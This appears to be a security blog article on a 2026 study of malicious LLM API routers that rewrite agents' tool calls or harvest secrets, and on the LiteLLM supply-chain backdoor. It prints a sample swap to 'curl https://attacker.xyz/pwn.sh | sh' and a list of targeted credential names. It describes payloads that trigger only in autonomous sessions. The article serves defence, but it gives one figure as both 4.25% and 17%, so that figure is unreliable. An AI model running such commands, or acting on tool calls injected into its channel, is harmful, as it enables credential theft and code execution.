Enterprise AI & Security

Your Agent Is Mine:
The Invisible Attack Surface
at the Heart of Every AI Stack

Every LLM API call you make may pass through an intermediary with full plaintext access to your system prompts, tool arguments, API keys, and model outputs — and there is no cryptographic mechanism that tells you whether the response was tampered with. Researchers just proved this attack is already happening at scale.

Research Source arXiv:2604.08407 — Liu et al., UC Santa Barbara / UCSD — April 9 2026

Straithead April 2026 11 min read Enterprise AI & Security

Live incident

March 24 2026: LiteLLM — the dominant open-source LLM API router with 95 million monthly downloads and direct dependencies from CrewAI, DSPy, Mem0, MLflow, Guardrails and dozens more — was backdoored by threat actor group TeamPCP. Versions 1.82.7 and 1.82.8 contained a credential harvester, Kubernetes lateral movement toolkit, and persistent backdoor. Every AI agent framework using LiteLLM as a transitive dependency was at risk. This is not hypothetical. It happened three weeks ago.

Routers actively injecting malicious code out of 428 tested

1 paid + 8 free — arXiv:2604.08407

Routers touching researcher-owned AWS canary credentials

Secret exfiltration confirmed live

401

Codex sessions already running in YOLO autonomous mode

Tool execution auto-approved — trivial to exploit

2.1B

Tokens processed through researcher-controlled decoy routers

99 credentials, 440 sessions captured

When you send a request to an LLM, you probably imagine a direct line: your application, the API, the model. The reality is often a multi-hop chain of intermediaries — API routers, aggregators, resellers — each terminating and re-originating TLS, each with full plaintext access to your API keys, system prompts, tool definitions, and every word the model returns. A research team at UC Santa Barbara and UC San Diego just published the first systematic study of what an attacker inside that chain can do. The answer is alarming. And the LiteLLM incident that occurred three weeks earlier proved that this attack surface is not theoretical.

The paper, “Your Agent Is Mine: Measuring Malicious Intermediary Attacks on the LLM Supply Chain,” formalises a threat model that most AI engineering teams have not seriously considered: the router-in-the-middle. Not an accidental network interception — a deliberately configured intermediary that your application sends every request to, that can read, modify, or fabricate any payload that passes through it, and against which there is currently no cryptographic defence at any layer of the major AI provider stack.

The Architecture Problem

How the Routing Layer Became an Invisible Trust Boundary

Modern AI production deployments rarely use a single model provider directly. Organisations need access to GPT-5, Claude, Gemini, and a growing range of open-weight models, with model fallback, load balancing, cost optimisation, and a single credential plane. LLM API routers fill this role: they accept requests in a unified format — typically OpenAI-compatible — select an upstream provider, and return the response.

The dominant open-source router, LiteLLM, has approximately 40,000 GitHub stars and over 240 million Docker Hub pulls. OpenRouter connects users to more than 300 active models from over 60 providers and serves millions of developers. Beyond these platforms, a large commodity market has emerged around resold and aggregated API access — particularly in regions where direct provider access is restricted or expensive. Investigative reporting documents Taobao merchants with over 30,000 repeat purchases for LLM API keys.

The critical architectural fact, which the paper formalises for the first time, is this: routers are composable, and the client configures only the first hop. A developer may purchase API access from a Taobao reseller, who aggregates keys from a second-tier aggregator, who routes through OpenRouter, which dispatches to the model host. That is four hops, each with full plaintext access. The client has no visibility into intermediate hops. And because no end-to-end integrity mechanism exists anywhere in this chain, a single malicious or compromised router at any layer taints everything downstream — without any honest router being able to detect that a preceding hop has already rewritten a tool call or exfiltrated a credential.

The Router-in-the-Middle — How a Single Malicious Hop Taints the Entire Chain

💻

Agent Client

Claude Code, Codex, custom agent. Configures only the first-hop URL.

Sees clean output

→

🔀

Router R₁

Honest router. Forwards unmodified. Receives tainted return.

Unaware

→

⚠️

Router R₄ — MALICIOUS

Full plaintext access. Reads API keys, rewrites tool calls, exfiltrates secrets.

Attacker controlled

→

🤖

Model Provider

OpenAI / Anthropic / Google. Produces legitimate response.

Unmodified output

The structural problem: no TLS downgrade or certificate forgery is required. The client voluntarily configures the router’s URL as the API endpoint. The router terminates the client-side TLS connection, reads every byte in plaintext, optionally rewrites the response, and originates a fresh TLS connection to the next hop. The provider’s response, once emitted, has no cryptographic binding to what the client ultimately executes. A malicious router anywhere in the chain can substitute a different tool call, silently log every secret, or drain a crypto wallet — and the client will have no indication anything was wrong.

The Attack Taxonomy

Four Attack Classes — From Credential Theft to Code Execution

The researchers define a formal taxonomy of Adversarial Router Behaviours, grounded in the attacks they observed in the wild. Two core attack classes and two adaptive evasion variants.

AC-1 — Core Attack

Response-Side Payload Injection

The router intercepts the model’s tool-call response and replaces a benign installer URL, pip dependency, or shell command with an attacker-controlled payload. The agent executes the injected command, believing it came from the model.

pip install requests → pip install requests-evil
curl https://cdn.example.com/setup.sh | sh
→ curl https://attacker.xyz/pwn.sh | sh

AC-2 — Core Attack

Passive Secret Exfiltration

The router reads every API key, system prompt, environment variable, and credential that transits the plaintext channel — without modifying a single response. Zero payload modification means zero detection signal. The client never knows.

Patterns matched: OPENAI_API_KEY, AWS_SECRET_ACCESS_KEY,
ANTHROPIC_API_KEY, ~/.kube/config, private_key_id,
database_password, GITHUB_TOKEN…

AC-1.a — Evasion Variant

Dependency-Targeted Injection

A sophisticated variant that monitors the conversation context and only injects malicious code when it detects Rust or Go dependency install patterns — targeting language-specific package managers to evade generic script-injection detectors.

Triggers only on: cargo add / go get patterns
Bypasses: generic bash injection screeners
Observed in wild: 2 routers, targeting Rust+Go projects

AC-1.b — Evasion Variant

Conditional Delivery

The router waits for a warm-up period (e.g. 50 prior calls) before activating, and/or delivers the malicious payload only when it detects the session is running in autonomous “YOLO mode” — where tool execution is pre-approved and human oversight is minimal.

Condition: call_count > 50 AND session_mode == “YOLO”
Effect: appears clean in testing, activates in production
Observed: 2 routers deploying adaptive evasion in wild

Why YOLO Mode Changes Everything

Many agent frameworks allow users to run in an “autonomous mode” where tool execution is automatically approved without human confirmation prompts. The researchers found that 401 of the 440 Codex sessions running through their decoy routers were already in YOLO mode — meaning tool execution was pre-approved. In these sessions, a simple payload injection in AC-1 is sufficient for full code execution on the target machine without any further exploitation. No social engineering. No privilege escalation. The agent just runs what the router tells it to run. As agentic AI systems are deployed at greater autonomy and scale, the fraction of sessions in YOLO-equivalent modes will only increase.

What the Researchers Found in the Wild

428 Routers, 9 Injecting Malicious Code, 1 Draining a Crypto Wallet

The empirical measurement study is the paper’s most striking contribution. The researchers purchased 28 paid routers from Taobao, Xianyu, and Shopify-hosted storefronts, and collected 400 free routers built on the dominant open-source templates — sub2api and new-api, which together have accumulated over 2.4 million Docker pulls. They equipped each router with instrumented canary credentials: AWS keys, API tokens, and an Ethereum private key, designed to trigger observable external signals if accessed.

Finding	Paid Routers (28)	Free Routers (400)	Severity
Actively injecting malicious code into tool calls (AC-1)	1 router (3.6%)	8 routers (2%)	Critical
Deploying adaptive evasion (AC-1.a or AC-1.b)	0	2 routers	High
Touching researcher-owned AWS canary credentials (AC-2)	Not separately reported	17 routers	High
Draining ETH from researcher-owned private key (AC-2)	0	1 router	Critical

The finding that 17 free routers accessed researcher-owned AWS canary credentials is particularly significant. AWS canary credentials are honeypot keys specifically designed to trigger an alert on any access — they have no legitimate use, so any access is definitionally malicious. 17 out of 400 free routers — 4.25% — exfiltrated and used these credentials. One router went further and drained ETH from a researcher-owned Ethereum private key that transited the service.

The adaptive evasion findings are equally alarming. Two routers in the wild were observed deploying AC-1.b conditional delivery — specifically targeting sessions in YOLO mode and waiting until a warm-up period elapsed before activating. This means the malicious behaviour is specifically engineered to be invisible during any testing period that precedes production deployment. A security team that tests a router before onboarding it — and finds it clean — may still be deploying a router that will activate its payload 50 calls into production.

The LiteLLM Incident

What Happened on March 24 2026 — and Why It Validates Every Finding

Three weeks before the paper’s publication, everything the researchers had formalised in theory was demonstrated at scale in production. On March 24 2026, threat actor group TeamPCP published versions 1.82.7 and 1.82.8 of LiteLLM to PyPI — having obtained the maintainer’s publishing credentials through a prior supply-chain compromise of Trivy, an open-source security scanner used in LiteLLM’s CI/CD pipeline.

The attack was multi-stage. Version 1.82.7 embedded a double base64-encoded payload in litellm/proxy/proxy_server.py. Version 1.82.8, published thirteen minutes later, escalated: it included a .pth file — a Python path configuration file that executes automatically on every Python interpreter startup, requiring no explicit import. Simply having the package installed meant every python, pytest, or pip install command in the environment triggered the payload. The malware harvested SSH private keys, AWS/GCP/Azure credentials, Kubernetes configs, API keys, and database passwords — then encrypted and exfiltrated them to an attacker-controlled domain.

The Blast Radius

LiteLLM had 95 million monthly downloads at the time of the incident. Direct dependencies included: CrewAI, Browser-Use, Opik, DSPy, Mem0, Instructor, Guardrails, Agno, Camel-AI, MLflow, Stripe and Netflix internal tooling. The two malicious versions were live for approximately three hours before PyPI quarantine. The researchers’ paper estimates that hundreds of thousands of systems may have been affected. The only constraint on the damage was an accidental bug in version 1.82.8 — the fork-bomb logic in the .pth launcher created an exponential process spawn that crashed machines before credential exfiltration could complete.

The attack chain that produced the LiteLLM incident began on February 27 2026, when TeamPCP exploited a misconfigured pull_request_target GitHub Actions workflow in Aqua Security’s Trivy repository to exfiltrate a Personal Access Token. After credential rotation was imperfect, TeamPCP used still-valid credentials to force-push 76 of 77 release tags in the trivy-action repository to malicious commits. Any CI/CD pipeline using standard Trivy version tags — rather than immutable SHA hashes — was unknowingly executing credential-stealing code for weeks. LiteLLM was the downstream target. The paper’s authors note that this incident demonstrated “the router trust boundary is not hypothetical: a single supply-chain entry point in one widely deployed router was sufficient to compromise the entire forwarding path.”

“No end-to-end integrity mechanism binds the provider’s tool-calling output to the action the client finally observes. An intermediary that terminates TLS on each side can therefore read, modify, or fabricate any tool-call payload without detection.”

Liu et al. — arXiv:2604.08407, April 9 2026

The Defences

Three Things You Can Deploy Today — Without Provider Cooperation

The researchers built a research proxy called Mine that implements all four attack classes against Claude Code, Codex, and two other public agent frameworks. They then used Mine to evaluate three client-side defences that can be deployed without changes to the model provider. The good news: two of the three perform strongly against the core attack classes.

Defense 1

Fail-Closed High-Risk Tool Policy Gate

A client-side filter that blocks all tool calls matching high-risk shell execution patterns before the agent executes them. If the response cannot be verified against an allowlist of expected tool patterns, execution is blocked by default.

100% block rate on AC-1 + AC-1.a samples at 1.0% false positives

Defense 2

Response-Side Anomaly Screening

Statistical analysis of tool-call responses to detect payloads that deviate from the distribution of clean responses for the same tool type. Flags anomalous responses before execution without requiring a provider-side integrity mechanism.

89% detection rate on AC-1 samples

Defense 3

Append-Only Transparency Logging

Every request sent to the router and every response received is logged to an append-only audit store before execution. Enables post-incident forensics and makes tampering detectable through comparison with upstream provider logs.

100% forensic coverage — enables incident detection

The researchers are clear that these defences reduce exposure but do not solve the underlying problem. The fail-closed policy gate requires maintaining an allowlist of legitimate tool patterns — an operational burden that scales with application complexity and breaks when new tools are introduced. The anomaly screener has an 11% miss rate on the core AC-1 attack class, which is inadequate for high-stakes autonomous deployments. The transparency log is detective rather than preventive.

The ultimate solution — and the authors are explicit about this — is provider-backed response integrity: a cryptographic mechanism that binds the tool call an agent executes to what the upstream model actually produced, making any router-level tampering immediately detectable. No major AI provider currently implements this. It requires changes at the API layer that, to date, no provider has committed to shipping.

What Enterprise AI Teams Must Do Now

Audit your router dependencies. If your agent stack uses LiteLLM, OpenRouter, or any third-party API aggregator, map the full hop chain. Identify every intermediate that has plaintext access to your tool calls and credentials. Pin all dependencies to exact versions and validate against SHA hashes, not mutable version tags. Run with least-privilege credentials. API keys that transit routing infrastructure should have the minimum scope necessary — a key that can only call the inference endpoint should not also have write access to your cloud infrastructure. Implement the fail-closed policy gate immediately for any agent operating in YOLO or autonomous mode. Treat any router you do not control as an untrusted intermediary — because as this paper demonstrates, that is precisely what it may be.

The Trust Architecture of AI Is Broken by Design

The LLM supply chain has been assembled at extraordinary speed, by developers who needed model access, cost optimisation, and multi-provider routing — and who understandably treated the routing layer as infrastructure plumbing rather than a security boundary. That assumption is no longer defensible. This paper is the first systematic proof that the attack surface is real, is actively exploited, and scales with exactly the ecosystem dynamics — more models, more providers, more commodity router markets, more autonomous agents — that are accelerating in 2026.

The deeper problem is architectural. The tool-calling interface that makes LLM agents capable of booking flights, executing code, and managing cloud infrastructure is transmitted as plaintext JSON with no end-to-end integrity guarantee. A router that sits between your agent and the model can substitute any tool call for any other. It can drain your Ethereum wallet, install backdoors in your codebase, or silently log every secret your agent touches — and the only signal you might detect is that something downstream behaved unexpectedly.

The fix requires provider action. Until OpenAI, Anthropic, Google, and the other major providers implement response integrity — cryptographic binding between what the model produced and what the client executes — every agent deployment that routes through a third party is operating on trust rather than verification. In a world where 17% of free routers are actively touching canary credentials, and 401 out of 440 real-world agent sessions are running in YOLO autonomous mode, that trust is not justified.

Your agent may already be theirs.

Sources & References

Liu et al. — “Your Agent Is Mine: Measuring Malicious Intermediary Attacks on the LLM Supply Chain”, arXiv:2604.08407, April 9 2026: arxiv.org/abs/2604.08407
LiteLLM — “Security Update: Suspected Supply Chain Incident”, March 24 2026: docs.litellm.ai
FutureSearch — “litellm 1.82.8 Supply Chain Attack on PyPI”, March 2026: futuresearch.ai
Trend Micro — “Your AI Gateway Was a Backdoor: Inside the LiteLLM Supply Chain Compromise”, March 26 2026: trendmicro.com
Snyk — “How a Poisoned Security Scanner Became the Key to Backdooring LiteLLM”: snyk.io
Comet — “LiteLLM Supply Chain Attack: What Happened and How to Respond”, March 2026: comet.com
Cycode — “LiteLLM Supply Chain Attack: What Happened, Who’s Affected”, March 25 2026: cycode.com
Zscaler ThreatLabz — “Supply Chain Attacks Surge in March 2026”: zscaler.com
HeroDevs — “The LiteLLM Supply Chain Attack: What Happened, Why It Matters”: herodevs.com

The Invisible Attack Surfaceat the Heart of Every AI Stack

Your Agent Is Mine:
The Invisible Attack Surface
at the Heart of Every AI Stack

How the Routing Layer Became an Invisible Trust Boundary

Four Attack Classes — From Credential Theft to Code Execution

Response-Side Payload Injection

Passive Secret Exfiltration

Dependency-Targeted Injection

Conditional Delivery

428 Routers, 9 Injecting Malicious Code, 1 Draining a Crypto Wallet

What Happened on March 24 2026 — and Why It Validates Every Finding

Three Things You Can Deploy Today — Without Provider Cooperation

Fail-Closed High-Risk Tool Policy Gate

Response-Side Anomaly Screening

Append-Only Transparency Logging

The Trust Architecture of AI Is Broken by Design

Leave a Comment Cancel Reply

Your Agent Is Mine:The Invisible Attack Surfaceat the Heart of Every AI Stack

How the Routing Layer Became an Invisible Trust Boundary

Four Attack Classes — From Credential Theft to Code Execution

Response-Side Payload Injection

Passive Secret Exfiltration

Dependency-Targeted Injection

Conditional Delivery

428 Routers, 9 Injecting Malicious Code, 1 Draining a Crypto Wallet

What Happened on March 24 2026 — and Why It Validates Every Finding

Three Things You Can Deploy Today — Without Provider Cooperation

Fail-Closed High-Risk Tool Policy Gate

Response-Side Anomaly Screening

Append-Only Transparency Logging

The Trust Architecture of AI Is Broken by Design

Leave a Comment Cancel Reply

Your Agent Is Mine:
The Invisible Attack Surface
at the Heart of Every AI Stack